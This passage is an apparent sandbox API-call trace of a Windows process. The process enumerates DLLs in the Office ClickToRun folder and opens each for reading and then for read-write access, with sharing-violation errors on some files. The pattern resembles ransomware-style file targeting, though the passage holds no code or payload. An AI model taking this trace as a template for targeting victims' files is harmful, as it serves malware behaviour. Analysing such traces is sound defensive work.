InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0091.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0091.198] AreFileApisANSI () returned 1 [0091.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.198] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8d2c8 [0091.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8d2c8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 78 [0091.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.198] GetFileType (hFile=0x33c) returned 0x1 [0091.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0091.198] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0091.198] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0091.199] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0091.199] CloseHandle (hObject=0x33c) returned 1 [0091.199] AreFileApisANSI () returned 1 [0091.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8ce30 [0091.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x8ce30, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 78 [0091.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.199] GetLastError () returned 0x20 [0091.199] GetLastError () returned 0x20 [0091.199] SetLastError (dwErrCode=0x20) [0091.199] GetLastError () returned 0x20 [0091.199] SetLastError (dwErrCode=0x20) [0091.199] GetLastError () returned 0x20 [0091.199] SetLastError (dwErrCode=0x20) [0091.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0091.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0091.200] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.200] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.200] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a59305, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a59305, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x726d8, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppVIsvApi.dll", cAlternateFileName="APPVIS~1.DLL")) returned 1 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.200] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.200] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.200] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.200] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0091.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.200] AreFileApisANSI () returned 1 [0091.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll", lpUsedDefaultChar=0x0) returned 73 [0091.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0091.201] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.201] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0091.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0091.201] AreFileApisANSI () returned 1 [0091.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0091.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85a80 [0091.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85a80, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 73 [0091.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.201] GetFileType (hFile=0x33c) returned 0x1 [0091.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85a80 | out: hHeap=0x20000) returned 1 [0091.201] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0091.201] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0091.202] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0091.202] CloseHandle (hObject=0x33c) returned 1 [0091.202] AreFileApisANSI () returned 1 [0091.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0091.202] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0091.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 73 [0091.202] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.202] GetLastError () returned 0x20 [0091.202] GetLastError () returned 0x20 [0091.202] SetLastError (dwErrCode=0x20) [0091.202] GetLastError () returned 0x20 [0091.202] SetLastError (dwErrCode=0x20) [0091.202] GetLastError () returned 0x20 [0091.202] SetLastError (dwErrCode=0x20) [0091.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0091.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.202] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0091.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.202] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.203] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a7f55d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a7f55d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe1b7300, ftLastWriteTime.dwHighDateTime=0x1d0d7a5, nFileSizeHigh=0x0, nFileSizeLow=0x60ea0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="AppvIsvStream32.dll", cAlternateFileName="APPVIS~2.DLL")) returned 1 [0091.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0091.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0091.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0091.203] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0091.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0091.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0091.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0091.203] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0091.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0091.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0091.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0091.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0091.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0091.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0091.204] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0091.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0091.204] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0091.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0091.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0091.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0091.205] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.205] AreFileApisANSI () returned 1 [0091.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll", lpUsedDefaultChar=0x0) returned 78 [0091.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0091.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.205] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0091.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0091.205] AreFileApisANSI () returned 1 [0091.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.205] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8cf80 [0091.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8cf80, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 78 [0091.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.206] GetFileType (hFile=0x33c) returned 0x1 [0091.206] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cf80 | out: hHeap=0x20000) returned 1 [0091.206] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0091.208] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0091.208] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0091.209] CloseHandle (hObject=0x33c) returned 1 [0091.209] AreFileApisANSI () returned 1 [0091.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c7a0 [0091.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll") returned 78 [0091.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.209] GetFileType (hFile=0x33c) returned 0x1 [0091.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0091.209] CloseHandle (hObject=0x33c) returned 1 [0091.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.209] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.209] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0091.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.210] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.210] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0091.211] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0091.211] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0091.211] AreFileApisANSI () returned 1 [0091.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cdf0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0091.211] 